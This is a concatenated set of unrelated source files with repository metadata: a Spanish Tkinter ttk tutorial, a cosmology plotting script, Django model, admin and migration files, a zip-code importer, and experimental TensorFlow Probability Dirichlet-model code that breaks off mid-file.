[] |
no_license
|
Nataliodg/Python
|
1b860aae5135d9a5d34ca14f74f656adb8e76b11
|
59b66f1f67151eb5c3deec90249077c55291206a
|
refs/heads/main
| 2023-01-07T11:24:45.420199
| 2020-11-14T02:09:02
| 2020-11-14T02:09:02
| 312,727,510
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,054
|
py
|
#Tk hemos dicho que es una biblioteca de controles visuales que los podemos acceder desde Python y desde otros lenguajes de programación.
#En la versión Tk 8.5 sumó una nueva serie de controles visuales ( Notebook, Combobox etc.) y modernizó los que hemos visto en los conceptos anteriores.
# Para hacer uso de esta nueva versión de la biblioteca en Python se implementó un nuevo módulo y se lo agregó al paquete tkinter.
# Para hacer uso de este conjunto de Widget (controles visuales) debemos importar el paquete ttk.
# Todo lo que conocemos hasta ahora de los controles visuales del módulo tkinter funciona prácticamente sin cambios, lo que deberemos hacer es crear objetos de la clase Button, Entry etc. recuperándolos ahora del módulo tkinter.ttk
#1)
#Mostrar una ventana y en su interior dos botones y una label utilizando el módulo ttk. La label muestra inicialmente el valor 1.
# Cada uno de los botones permiten incrementar o decrementar en uno el contenido de la label
import tkinter as tk
from tkinter import ttk
class Aplicacion:
    """Window with a counter label plus increment/decrement buttons (ttk widgets)."""
    def __init__(self):
        self.valor=1
        self.ventana1=tk.Tk()
        self.ventana1.title("Controles Button y Label")
        self.label1=ttk.Label(self.ventana1, text=self.valor)
        self.label1.grid(column=0, row=0)
        self.label1.configure(foreground="red")
        self.boton1=ttk.Button(self.ventana1, text="Incrementar", command=self.incrementar)
        self.boton1.grid(column=0, row=1)
        self.boton2=ttk.Button(self.ventana1, text="Decrementar", command=self.decrementar)
        self.boton2.grid(column=0, row=2)
        # NOTE: mainloop() blocks, so __init__ does not return until the window closes.
        self.ventana1.mainloop()
    def incrementar(self):
        # Button callback: add one and refresh the label text.
        self.valor=self.valor+1
        self.label1.config(text=self.valor)
    def decrementar(self):
        # Button callback: subtract one and refresh the label text.
        self.valor=self.valor-1
        self.label1.config(text=self.valor)
# aplicacion1=Aplicacion()
#*****************************************************************
#2)
#Ingresar el nombre de usuario y clave en controles de tipo Entry.
# Si se ingresa las cadena (usuario: juan, clave="abc123") luego mostrar en el título de la ventana el mensaje "Correcto" en caso contrario mostrar el mensaje "Incorrecto".
# Utilizar Widget del módulo ttk.
class Aplicacion2:
    """Login form: window title becomes "Correcto" for juan/abc123, else "Incorrecto"."""
    def __init__(self):
        self.ventana1=tk.Tk()
        self.label1=ttk.Label(text="Ingrese nombre de usuario:")
        self.label1.grid(column=0, row=0)
        self.dato1=tk.StringVar()
        self.entry1=ttk.Entry(self.ventana1, width=30, textvariable=self.dato1)
        self.entry1.grid(column=1, row=0)
        self.label2=ttk.Label(text="Ingrese clave:")
        self.label2.grid(column=0, row=1)
        self.dato2=tk.StringVar()
        # show="*" masks the typed password characters.
        self.entry2=ttk.Entry(self.ventana1, width=30, textvariable=self.dato2, show="*")
        self.entry2.grid(column=1, row=1)
        self.boton1=ttk.Button(self.ventana1, text="Ingresar", command=self.ingresar)
        self.boton1.grid(column=1, row=2)
        self.ventana1.mainloop()
    def ingresar(self):
        # Credentials are hard-coded for this exercise — not for real use.
        if self.dato1.get()=="juan" and self.dato2.get()=="abc123":
            self.ventana1.title("Correcto")
        else:
            self.ventana1.title("Incorrecto")
# aplicacion1=Aplicacion2()
#***************************************************************
#3)
#Mostrar dos controles de tipo Radiobutton con las etiquetas "Varón" y "Mujer",
# cuando se presione un botón actualizar una Label con el Radiobutton seleccionado.
class Aplicacion3:
    """Two radio buttons ("Varon"/"Mujer"); a button shows the selection in a label."""
    def __init__(self):
        self.ventana1=tk.Tk()
        self.seleccion=tk.IntVar()
        # Pre-select option 2 ("Mujer").
        self.seleccion.set(2)
        self.radio1=ttk.Radiobutton(self.ventana1,text="Varon", variable=self.seleccion, value=1)
        self.radio1.grid(column=0, row=0)
        self.radio2=ttk.Radiobutton(self.ventana1,text="Mujer", variable=self.seleccion, value=2)
        self.radio2.grid(column=0, row=1)
        self.boton1=ttk.Button(self.ventana1, text="Mostrar seleccionado", command=self.mostrarseleccionado)
        self.boton1.grid(column=0, row=2)
        self.label1=ttk.Label(text="opcion seleccionada")
        self.label1.grid(column=0, row=3)
        self.ventana1.mainloop()
    def mostrarseleccionado(self):
        # Button callback: reflect the shared IntVar's value in the label.
        if self.seleccion.get()==1:
            self.label1.configure(text="opcion seleccionada=Varon")
        if self.seleccion.get()==2:
            self.label1.configure(text="opcion seleccionada=Mujer")
# aplicacion1=Aplicacion3()
#****************************************************************
#4)
#Mostrar una ventana y en su interior tres controles de tipo Checkbutton cuyas etiquetas correspondan a distintos lenguajes de programación.
# Cuando se presione un botón mostrar en una Label la cantidad de Checkbutton que se encuentran chequeados.
# Utilizar Widget del módulo ttk.
class Aplicacion4:
    """Three language checkbuttons; a button counts how many are checked."""
    def __init__(self):
        self.ventana1=tk.Tk()
        self.seleccion1=tk.IntVar()
        self.check1=ttk.Checkbutton(self.ventana1,text="Python", variable=self.seleccion1)
        self.check1.grid(column=0, row=0)
        self.seleccion2=tk.IntVar()
        self.check2=ttk.Checkbutton(self.ventana1,text="C++", variable=self.seleccion2)
        self.check2.grid(column=0, row=1)
        self.seleccion3=tk.IntVar()
        self.check3=ttk.Checkbutton(self.ventana1,text="Java", variable=self.seleccion3)
        self.check3.grid(column=0, row=2)
        self.boton1=ttk.Button(self.ventana1, text="Verificar", command=self.verificar)
        self.boton1.grid(column=0, row=4)
        self.label1=ttk.Label(text="cantidad:")
        self.label1.grid(column=0, row=5)
        self.ventana1.mainloop()
    def verificar(self):
        # Each IntVar holds 1 while its checkbutton is ticked.
        cant=0
        if self.seleccion1.get()==1:
            cant+=1
        if self.seleccion2.get()==1:
            cant+=1
        if self.seleccion3.get()==1:
            cant+=1
        self.label1.configure(text="cantidad:"+str(cant))
# aplicacion1=Aplicacion4()
#*****************************************************************
#5)
#Disponer un Listbox con una serie de nombres de frutas.
# Permitir la selección solo de uno de ellos.
# Cuando se presione un botón recuperar la fruta seleccionada y mostrarla en una Label.
class Aplicacion5:
    """Listbox of fruit names; a button copies the selected item into a label."""
    def __init__(self):
        self.ventana1=tk.Tk()
        self.listbox1=tk.Listbox(self.ventana1)
        self.listbox1.grid(column=0,row=0)
        self.listbox1.insert(0,"papa")
        self.listbox1.insert(1,"manzana")
        self.listbox1.insert(2,"pera")
        self.listbox1.insert(3,"sandia")
        self.listbox1.insert(4,"naranja")
        self.listbox1.insert(5,"melon")
        self.boton1=ttk.Button(self.ventana1, text="Recuperar", command=self.recuperar)
        self.boton1.grid(column=0, row=1)
        self.label1=ttk.Label(text="Seleccionado:")
        self.label1.grid(column=0, row=2)
        self.ventana1.mainloop()
    def recuperar(self):
        # curselection() is empty when nothing is selected; guard against that.
        if len(self.listbox1.curselection())!=0:
            self.label1.configure(text=self.listbox1.get(self.listbox1.curselection()[0]))
aplicacion1=Aplicacion5()
|
[
"natadg@outlook.com"
] |
natadg@outlook.com
|
9fe14f76ed7f167080c56d6ae5377451ea028db9
|
607241e619ca499121106b218a5e00ac5244bda3
|
/analysis/zeldovich_enzo_mass.py
|
808a1269774d71bef4bd037a05e3c33e5614d2a5
|
[] |
no_license
|
bvillasen/cosmo_sims
|
37caea950c7be0626a5170333bfe734071c58124
|
8b20dc05842a22ea50ceb3d646037d2e66fc8c9b
|
refs/heads/master
| 2020-04-22T23:22:28.670894
| 2020-01-02T23:32:39
| 2020-01-02T23:32:39
| 114,167,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,713
|
py
|
import sys
import numpy as np
import matplotlib.pyplot as plt
import h5py as h5
import yt
dev_dir = '/home/bruno/Desktop/Dropbox/Developer/'
cosmo_dir = dev_dir + 'cosmo_sims/'
toolsDirectory = cosmo_dir + "tools/"
sys.path.extend([toolsDirectory ] )
from load_data_cholla import load_snapshot_data
from internal_energy import get_internal_energy, get_temp, get_Temperaure_From_Flags_DE
# from load_data_enzo import load_snapshot_enzo
from cosmo_constants import *
from tools import create_directory
from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
nSnap = rank
# rank = 0
dataDir = '/raid/bruno/data/'
# dataDir = '/home/bruno/Desktop/data/'
data_set = 'enzo_simple_beta_convDE'
startSnap = 27
enzoDir = dataDir + 'cosmo_sims/enzo/ZeldovichPancake_HLLC/'
outDir = dev_dir + 'figures/zeldovich_mass/'
if rank == 0:
    # Only one MPI rank creates the shared output directory.
    create_directory( outDir )
a_list = []
gamma = 5./3
j_indx = 0
i_indx = 0
# Grid geometry: box size L (code units), n cells, cell width dx.
L = 64.
n = 256
dx = L / ( n )
x = np.arange(0, 256, 1)* dx + 0.5*dx
dv = (dx*1e3)**3
# One directory per reconstruction/solver variant to compare.
chollaDir_0 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PLMC_HLLC_VL_eta0.001_0.030_z1/'
chollaDir_1 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PLMP_HLLC_VL_eta0.001_0.030_z1/'
chollaDir_2 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMC_HLLC_VL_eta0.001_0.030_z1_ic0/'
chollaDir_3 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic64/'
chollaDir_4 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic32/'
chollaDir_5 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic4/'
chollaDir_6 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMP_HLLC_VL_eta0.001_0.030_z1_ic0/'
# chollaDir_3 = dataDir + 'cosmo_sims/cholla_pm/zeldovich/data_PPMC_HLLC_VL_eta0.001_0.030_z1_signStone/'
dir_list = [ chollaDir_0, chollaDir_1, chollaDir_2, chollaDir_3, chollaDir_4, chollaDir_5, chollaDir_6 ]
labels = ['PLMC', 'PLMP', 'PPMC_ic0', 'PPMP_ic64', 'PPMP_ic32', 'PPMP_ic4', 'PPMP_ic0', ]
out_file_name = 'zeldovich_mass.png'
#Plot UVB uvb_rates
nrows=1
ncols = 1
fig, ax = plt.subplots(nrows=nrows, ncols=ncols, figsize=(10*ncols,8*nrows))
lw = 3
# One total-mass-vs-redshift curve per simulation variant.
for i,chollaDir in enumerate(dir_list):
    # NOTE: Python 2 print statement — this script is Python 2 only.
    print chollaDir
    mass = []
    z = []
    for nSnap in range(50):
        data_cholla = load_snapshot_data( nSnap, chollaDir )
        current_z = data_cholla['current_z']
        dens_ch = data_cholla['gas']['density'][...]
        # NOTE(review): mass_tot = sum(density) / dv with dv = (dx*1e3)**3 —
        # confirm the intended unit conversion against load_snapshot_data.
        mass_tot = dens_ch.sum() / dv
        z.append(current_z)
        mass.append( mass_tot )
    # print mass
    ax.plot( z, mass, label=labels[i] )
ax.legend()
ax.set_xlabel('Redshift')
ax.set_ylabel(r'Mass [$\mathrm{M}_{\odot}/h$ ]')
fig.savefig( outDir+out_file_name, bbox_inches='tight', dpi=100)
|
[
"bvillasen@gmail.com"
] |
bvillasen@gmail.com
|
f1b5e70d317865f9e1d39f6a0a2dc9db7d644297
|
7dc0d691734741233d94eab627a22087b6b08830
|
/dashboard/admin.py
|
618045ac9077cee68fb6e2f74e2bda11add3ffc0
|
[] |
no_license
|
IshSiva/Paper-Pro
|
0aeea869fe5b7c773173c5fbfc41d9109e1ef55c
|
af85ba3490a92ae0300fa1873524aa9a93604265
|
refs/heads/master
| 2022-11-20T09:08:40.553150
| 2020-07-19T06:18:05
| 2020-07-19T06:18:05
| 280,803,215
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 116
|
py
|
from django.contrib import admin
from .models import Paper
# Expose the Paper model in the Django admin site with the default ModelAdmin.
admin.site.register(Paper)
# Register your models here.
|
[
"ish23.siva@gmail.com"
] |
ish23.siva@gmail.com
|
0bf604d36670b6e71f496a6857745f8d1f01a1bc
|
a316f5ad014ff2dfb0d75bc4e227129eb441aa17
|
/portal/models/address.py
|
7bea7538eace9892166659354088dd9d9884e4ff
|
[
"BSD-3-Clause"
] |
permissive
|
jmillr/true_nth_usa_portal
|
d39fbd3abfc850a92fe84b27981372358ffc7742
|
c756147b24cbc6988ac61c601491e4604074c3a7
|
refs/heads/master
| 2021-07-05T11:34:19.424564
| 2017-09-01T00:16:40
| 2017-09-01T00:16:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,384
|
py
|
"""Address module
Address data lives in the 'addresses' table. Several entities link
to address via foreign keys.
"""
from ..database import db
from sqlalchemy.dialects.postgresql import ENUM
# FHIR Address value sets persisted as PostgreSQL ENUM column types.
# create_type=False: the ENUM types are created by migrations, not at runtime.
address_type = ENUM('postal', 'physical', 'both', name='address_type',
                    create_type=False)
address_use = ENUM('home', 'work', 'temp', 'old', name='address_use',
                   create_type=False)
class Address(db.Model):
    """SQLAlchemy model for the `addresses` table.

    Stores a FHIR-style address; other entities reference rows here via
    foreign keys.  Up to three free-text address lines are persisted
    (line1..line3); additional FHIR lines are folded into line3.
    """
    __tablename__ = 'addresses'
    id = db.Column(db.Integer(), primary_key=True)
    use = db.Column('a_use', address_use)      # home / work / temp / old
    type = db.Column('a_type', address_type)   # postal / physical / both
    line1 = db.Column(db.Text)
    line2 = db.Column(db.Text)
    line3 = db.Column(db.Text)
    city = db.Column(db.Text)
    district = db.Column(db.Text)
    state = db.Column(db.Text)
    postalCode = db.Column(db.Text)
    country = db.Column(db.Text)

    @property
    def lines(self):
        """Return the non-empty address lines joined by '; '.

        The generator's iterable tuple must be parenthesized — the
        original unparenthesized form is a SyntaxError on Python 3.
        """
        return '; '.join(
            el for el in (self.line1, self.line2, self.line3) if el)

    def __str__(self):
        return "Address: {0.use} {0.type} {0.lines} {0.city} {0.district}"\
                " {0.state} {0.postalCode} {0.country}".format(self)

    @classmethod
    def from_fhir(cls, data):
        """Build an Address from a FHIR Address resource dict."""
        adr = cls()
        if 'line' in data:
            for i, line in enumerate(data['line'], start=1):
                # in case of 4 or more lines, delimit and append to line3
                if i > 3:
                    adr.line3 = '; '.join((adr.line3, line))
                else:
                    setattr(adr, 'line{}'.format(i), line)
        for attr in ('use', 'type'):
            if attr in data:
                # the ENUM columns store lower-case values
                setattr(adr, attr, data[attr].lower())
        for attr in ('city', 'district', 'state', 'postalCode', 'country'):
            if attr in data:
                setattr(adr, attr, data[attr])
        return adr

    def as_fhir(self):
        """Serialize to a FHIR Address resource dict.

        use/type are always emitted (possibly None, matching the original
        behavior); other fields are omitted when falsy.
        """
        d = {}
        d['use'] = self.use
        d['type'] = self.type
        d['line'] = [el for el in (self.line1, self.line2, self.line3) if el]
        for attr in ('city', 'district', 'state', 'postalCode', 'country'):
            value = getattr(self, attr, None)
            if value:
                d[attr] = value
        return d
|
[
"pbugni@u.washington.edu"
] |
pbugni@u.washington.edu
|
44c3626a05812bdb86c0889e2b76950d61f74b14
|
387b6a8dfc1cbaff159edbf5bf189efbb3532220
|
/apps/awards/migrations/0005_auto_20200112_1930.py
|
710a5aca670054b8d91134722f434995ddd00d9b
|
[] |
no_license
|
jhurtadojerves/characters
|
68d9417704c9828cb3ac93ed2dce90b8608a41d4
|
c0702ef56890381801de67341e0333fb1060d08d
|
refs/heads/master
| 2022-06-21T20:28:20.270598
| 2022-06-09T14:04:10
| 2022-06-09T14:04:10
| 207,205,432
| 0
| 0
| null | 2020-02-13T15:42:50
| 2019-09-09T02:14:26
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 1,742
|
py
|
# Generated by Django 3.0 on 2020-01-12 19:30
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
    """Auto-generated migration (Django 3.0, 2020-01-12).

    Wires up the awards voting models: a unique UUID token on AccessToken,
    a participants M2M on Category, and the three protected foreign keys a
    Voting row needs (category, selected option, and voting user).
    """
    dependencies = [
        ("characters", "0013_auto_20190913_0939"),
        ("awards", "0004_category_award"),
    ]
    operations = [
        migrations.AddField(
            model_name="accesstoken",
            name="token",
            field=models.UUIDField(default=uuid.uuid4, editable=False, unique=True),
        ),
        migrations.AddField(
            model_name="category",
            name="participants",
            field=models.ManyToManyField(
                related_name="categories", to="characters.Character"
            ),
        ),
        # For the three FKs below, default=1 only backfills existing rows
        # during this migration (preserve_default=False drops it afterwards).
        migrations.AddField(
            model_name="voting",
            name="category",
            field=models.ForeignKey(
                default=1,
                on_delete=django.db.models.deletion.PROTECT,
                related_name="votes",
                to="awards.Category",
            ),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="voting",
            name="selected_option",
            field=models.ForeignKey(
                default=1,
                on_delete=django.db.models.deletion.PROTECT,
                to="characters.Character",
            ),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name="voting",
            name="user",
            field=models.ForeignKey(
                default=1,
                on_delete=django.db.models.deletion.PROTECT,
                to="awards.AccessToken",
            ),
            preserve_default=False,
        ),
    ]
|
[
"juliohurtado@MacBook-Pro-de-Julio.local"
] |
juliohurtado@MacBook-Pro-de-Julio.local
|
095a75dc9f76da69b03dfe60e9f876793bbe6e88
|
8442bfdedfc18680be49aa77b976ed2732a13d7d
|
/The_Python_Book/Python_Essentials/scope.py
|
bff7ee120c0cc79d80c5fd3cfcb22d9706912ce8
|
[] |
no_license
|
huegli/Learning_Python
|
d61a236f85675ae194448bb81ff811708c926dc5
|
88565e623a3b978ce257ea2ea44dd0cfa672fe1b
|
refs/heads/master
| 2020-04-12T01:42:05.388424
| 2018-10-09T00:04:12
| 2018-10-09T00:04:12
| 48,859,809
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 99
|
py
|
#!/usr/bin/env python2
# Demonstrates that the guarded assignment never runs: cont is False, so
# var keeps its zero value and nothing is printed.
cont = False
var = 1234 if cont else 0
if var:
    print(var)
|
[
"nikolai.schlegel@gmail.com"
] |
nikolai.schlegel@gmail.com
|
87cea978ed76cf4c8c6ec4a24f6b08a2228227d4
|
5a856ce08fc5df2c13e069bc8e6ab2b88dc97e68
|
/programming/epost_zipcode_csv.py
|
ea0eb3e62ad13bbe44fa01086341fa3ac04e7d9e
|
[] |
no_license
|
bin7808/teacher6
|
b05f30b2ebd7cfb7b0b314832f0d56f192233a7e
|
bcc08136101979162ff738616fb9eabfd8b757b9
|
refs/heads/master
| 2021-01-09T06:05:04.862399
| 2016-08-12T07:41:40
| 2016-08-12T07:41:40
| 65,533,093
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 763
|
py
|
# One-off loader: bulk-import Seoul zip codes from a '|'-delimited dump file
# into the blog.ZipCode table.  Django must be configured before the model
# import, hence the setup calls at the top.
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "programming.settings")
import django
django.setup()
import csv

CSV_PATH = '20150710_seoul.txt'

from blog.models import ZipCode  # must come after django.setup()

# The government dump is cp949-encoded; `with` closes the file handle that
# the original version leaked.
zip_code_list = []
with open(CSV_PATH, 'rt', encoding='cp949') as csv_file:
    reader = csv.reader(csv_file, delimiter='|')
    columns = next(reader)  # header row: column names
    for idx, row in enumerate(reader):
        data = dict(zip(columns, row))
        zip_code = ZipCode(
            city=data['시도'], road=data['도로명'], dong=data['법정동명'],
            gu=data['시군구'], code=data['우편번호'])
        zip_code_list.append(zip_code)
        # zip_code.save()
        # print(data['우편번호'])
        # if idx > 10: break
print('zip_code size : {}'.format(len(zip_code_list)))
# Insert in batches of 100 to keep each INSERT statement bounded.
ZipCode.objects.bulk_create(zip_code_list, 100)
|
[
"bin7808@gmail.com"
] |
bin7808@gmail.com
|
def370a2502681e80a7c73419b1dd663c09f1d72
|
f41e861a9e4fef4606753de92ed6098ae2f8337e
|
/tests/tests_during_development/no_edward_tests.py
|
2eb4df8ddc73dd57faebd73227a86923bc9ec034
|
[
"BSD-3-Clause"
] |
permissive
|
jpimentabernardes/scCODA
|
cb1910a1fc3339286784a3772f6a51b148f8c240
|
db610c1bda904f79a8142da767cf8e62d1cd8d32
|
refs/heads/master
| 2023-02-16T05:38:10.006874
| 2020-12-08T11:08:16
| 2020-12-08T11:08:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,887
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import tensorflow_probability as tfp
import importlib
import pandas as pd
from tensorflow_probability.python.experimental import edward2 as ed
from scdcdm.util import result_classes as res
from scdcdm.model import dirichlet_models as mod
from scdcdm.util import comp_ana as ca
tfd = tfp.distributions
tfb = tfp.bijectors
pd.set_option('display.max_columns', 500)
#%%
# Testing
from scdcdm.util import data_generation as gen
n = 5
cases = 1
K = 5
n_samples = [n, n]
n_total = np.full(shape=[2*n], fill_value=1000)
data = gen.generate_case_control(cases, K, n_total[0], n_samples,
w_true=np.array([[1, 0, 0, 0, 0]]),
b_true=np.log(np.repeat(0.2, K)).tolist())
x = data.obs.values
y = data.X
print(x)
print(y)
#%%
importlib.reload(mod)
importlib.reload(res)
import patsy as pt
cell_types = data.var.index.to_list()
formula = "x_0"
# Get count data
data_matrix = data.X.astype("float32")
# Build covariate matrix from R-like formula
covariate_matrix = pt.dmatrix(formula, data.obs)
covariate_names = covariate_matrix.design_info.column_names[1:]
covariate_matrix = covariate_matrix[:, 1:]
model = mod.NoBaselineModelNoEdward(covariate_matrix=np.array(covariate_matrix), data_matrix=data_matrix,
cell_types=cell_types, covariate_names=covariate_names, formula=formula)
print(model.target_log_prob_fn(model.params["mu_b"], model.params["sigma_b"], model.params["b_offset"], model.params["ind_raw"], model.params["alpha"]))
#%%
result = model.sample_hmc(num_results=int(1000), n_burnin=500)
result.summary()
#%%
model_2 = ca.CompositionalAnalysis(data, "x_0", baseline_index=None)
print(model_2.target_log_prob_fn(model_2.params[0], model_2.params[1], model_2.params[2], model_2.params[3], model_2.params[4]))
#%%
res_2 = model_2.sample_hmc(num_results=int(1000), n_burnin=500)
res_2.summary()
#%%
D = x.shape[1]
K = y.shape[1]
N = y.shape[0]
dtype = tf.float32
beta_size = [D, K]
alpha_size = [1, K]
#tf.random.set_seed(5678)
test_model = tfd.JointDistributionSequential([
tfd.Independent(
tfd.Normal(loc=tf.zeros(1, dtype=dtype),
scale=tf.ones(1, dtype=dtype),
name="mu_b"),
reinterpreted_batch_ndims=1),
tfd.Independent(
tfd.HalfCauchy(tf.zeros(1, dtype=dtype),
tf.ones(1, dtype=dtype),
name="sigma_b"),
reinterpreted_batch_ndims=1),
tfd.Independent(
tfd.Normal(
loc=tf.zeros([D, K], dtype=dtype),
scale=tf.ones([D, K], dtype=dtype),
name="b_offset"),
reinterpreted_batch_ndims=2),
lambda b_offset, sigma_b, mu_b: tfd.Independent(
tfd.Deterministic(
loc=mu_b + sigma_b * b_offset,
name="b_raw"
),
reinterpreted_batch_ndims=2),
# Spike-and-slab
tfd.Independent(
1 / (1 + tf.exp(tfd.Normal(
loc=tf.zeros(shape=[D, K], dtype=dtype),
scale=tf.ones(shape=[D, K], dtype=dtype)*50))),
name="ind"
,
reinterpreted_batch_ndims=2),
# Betas
lambda ind, b_raw: tfd.Independent(
tfd.Deterministic(
loc=ind*b_raw,
name="beta"
),
reinterpreted_batch_ndims=2),
tfd.Independent(
tfd.Normal(
loc=tf.zeros(alpha_size),
scale=tf.ones(alpha_size) * 5,
name="alpha"),
reinterpreted_batch_ndims=2),
# concentration
lambda alpha, beta: tfd.Independent(
tfd.Deterministic(
loc=tf.exp(alpha + tf.matmul(tf.cast(x, dtype), beta)),
name="concentration"
),
reinterpreted_batch_ndims=2),
# Cell count prediction via DirMult
lambda concentration_: tfd.Independent(
tfd.DirichletMultinomial(
total_count=tf.cast(n_total, dtype),
concentration=concentration_,
name="predictions"),
reinterpreted_batch_ndims=1),
])
#%%
init_mu_b = tf.zeros(1, name="init_mu_b", dtype=dtype)
init_sigma_b = tf.ones(1, name="init_sigma_b", dtype=dtype)
init_b_offset = tf.zeros(beta_size, name="init_b_offset", dtype=dtype)
#init_b_offset = tf.random.normal(beta_size, 0, 1, name='init_b_offset', dtype=dtype)
init_ind = tf.ones(beta_size, name='init_ind', dtype=dtype)*0.5
init_ind_raw = tf.zeros(beta_size, name="init_ind_raw")
init_alpha = tf.zeros(alpha_size, name="init_alpha", dtype=dtype)
#init_alpha = tf.random.normal(alpha_size, 0, 1, name='init_alpha', dtype=dtype)
init_b_raw = init_mu_b + init_sigma_b * init_b_offset
init_beta = init_ind * init_b_raw
init_conc = tf.exp(init_alpha + tf.matmul(tf.cast(x, dtype), init_beta))
init_pred = tf.cast(y, dtype)
params_lp = [init_mu_b,
init_sigma_b,
init_b_offset,
init_b_raw,
init_ind,
init_beta,
init_alpha,
init_conc,
init_pred
]
params = [init_mu_b,
init_sigma_b,
init_b_offset,
#init_b_raw,
init_ind,
#init_beta,
init_alpha,
#init_conc,
#init_pred
]
#%%
test_sam = test_model.sample()
print(test_sam)
print(test_model.log_prob(params_lp))
print(test_model.resolve_graph())
print(test_model.variables)
#%%
test_model_2 = tfd.JointDistributionSequential([
tfd.Independent(
tfd.Normal(loc=tf.zeros(1, dtype=dtype),
scale=tf.ones(1, dtype=dtype),
name="mu_b"),
reinterpreted_batch_ndims=1),
tfd.Independent(
tfd.HalfCauchy(tf.zeros(1, dtype=dtype),
tf.ones(1, dtype=dtype),
name="sigma_b"),
reinterpreted_batch_ndims=1),
tfd.Independent(
tfd.Normal(
loc=tf.zeros([D, K], dtype=dtype),
scale=tf.ones([D, K], dtype=dtype),
name="b_offset"),
reinterpreted_batch_ndims=2),
# Spike-and-slab
tfd.Independent(
tfd.Normal(
loc=tf.zeros(shape=[D, K], dtype=dtype),
scale=tf.ones(shape=[D, K], dtype=dtype)*50,
name='ind_raw'),
reinterpreted_batch_ndims=2),
tfd.Independent(
tfd.Normal(
loc=tf.zeros(alpha_size),
scale=tf.ones(alpha_size) * 5,
name="alpha"),
reinterpreted_batch_ndims=2),
# Cell count prediction via DirMult
lambda alpha, ind_raw, b_offset, sigma_b, mu_b: tfd.Independent(
tfd.DirichletMultinomial(
total_count=tf.cast(n_total, dtype),
concentration=tf.exp(alpha
+ tf.matmul(tf.cast(x, dtype),
(1 / (1 + tf.exp(-ind_raw)))
* (mu_b + sigma_b * b_offset)
)),
name="predictions"),
reinterpreted_batch_ndims=1),
])
params_2 = [init_mu_b,
init_sigma_b,
init_b_offset,
init_ind_raw,
init_alpha,
init_pred
]
params_small = [init_mu_b,
init_sigma_b,
init_b_offset,
init_ind_raw,
init_alpha,
# init_pred
]
#%%
test_sam_2 = test_model_2.sample()
#print(test_sam_2)
print(test_model_2.log_prob(params_2))
print(test_model_2.resolve_graph())
print(test_model_2.log_prob_parts(params_2))
#%%
def target_log_prob_fn_small(mu_b_, sigma_b_, b_offset_, ind_, alpha_):
return test_model_2.log_prob((mu_b_, sigma_b_, b_offset_, ind_, alpha_, tf.cast(y, dtype)))
num_results = 10000
num_burnin_steps = 5000
step_size = 0.01
num_leapfrog_steps = 10
constraining_bijectors = [
tfb.Identity(),
tfb.Identity(),
tfb.Identity(),
tfb.Identity(),
tfb.Identity(),
]
hmc_kernel = tfp.mcmc.HamiltonianMonteCarlo(
target_log_prob_fn=target_log_prob_fn_small,
step_size=step_size,
num_leapfrog_steps=num_leapfrog_steps)
hmc_kernel = tfp.mcmc.TransformedTransitionKernel(
inner_kernel=hmc_kernel, bijector=constraining_bijectors)
hmc_kernel = tfp.mcmc.SimpleStepSizeAdaptation(
inner_kernel=hmc_kernel, num_adaptation_steps=int(4000), target_accept_prob=0.9)
@tf.function
def do_sampling_small():
return tfp.mcmc.sample_chain(
num_results=num_results,
num_burnin_steps=num_burnin_steps,
current_state=params_small,
kernel=hmc_kernel)
states_small, kernel_results_small = do_sampling_small()
#%%
print(states_small)
#%%
def log_joint_old(y, alpha_, mu_b_, sigma_b_, b_offset_, ind_):
rv_alpha = tfd.Normal(
loc=tf.zeros(alpha_size),
scale=tf.ones(alpha_size) * 5,
name="alpha")
rv_mu_b = tfd.Normal(loc=tf.zeros(1, dtype=dtype),
scale=tf.ones(1, dtype=dtype),
name="mu_b")
rv_sigma_b = tfd.HalfCauchy(tf.zeros(1, dtype=dtype),
tf.ones(1, dtype=dtype),
name="sigma_b")
rv_b_offset = tfd.Normal(
loc=tf.zeros([D, K], dtype=dtype),
scale=tf.ones([D, K], dtype=dtype),
name="b_offset")
rv_ind = tfd.LogitNormal(
loc=tf.zeros(shape=[D, K], dtype=dtype),
scale=tf.ones(shape=[D, K], dtype=dtype)*50,
name='ind')
beta_raw_ = mu_b_ + sigma_b_ * b_offset_
beta_ = ind_ * beta_raw_
concentration_ = tf.exp(alpha_ + tf.matmul(tf.cast(x, dtype), beta_))
predictions_ = tfd.DirichletMultinomial(
total_count=tf.cast(n_total, dtype),
concentration=concentration_,
name="predictions")
return(tf.reduce_sum(rv_alpha.log_prob(alpha_))
+ tf.reduce_sum(rv_mu_b.log_prob(mu_b_))
+ tf.reduce_sum(rv_sigma_b.log_prob(sigma_b_))
+ tf.reduce_sum(rv_b_offset.log_prob(b_offset_))
+ tf.reduce_sum(rv_ind.log_prob(ind_))
+ tf.reduce_sum(predictions_.log_prob(y))
)
init_ind_raw = tf.zeros(beta_size, name="init_ind_raw")
params_old = [
init_pred,
init_alpha,
init_mu_b,
init_sigma_b,
init_b_offset,
init_ind,
]
#%%
init_old = [
init_alpha,
init_mu_b,
init_sigma_b,
init_b_offset,
init_ind,
]
print(log_joint_old(*params_old))
plp_old = lambda *args: log_joint_old(init_pred, *args)
@tf.function
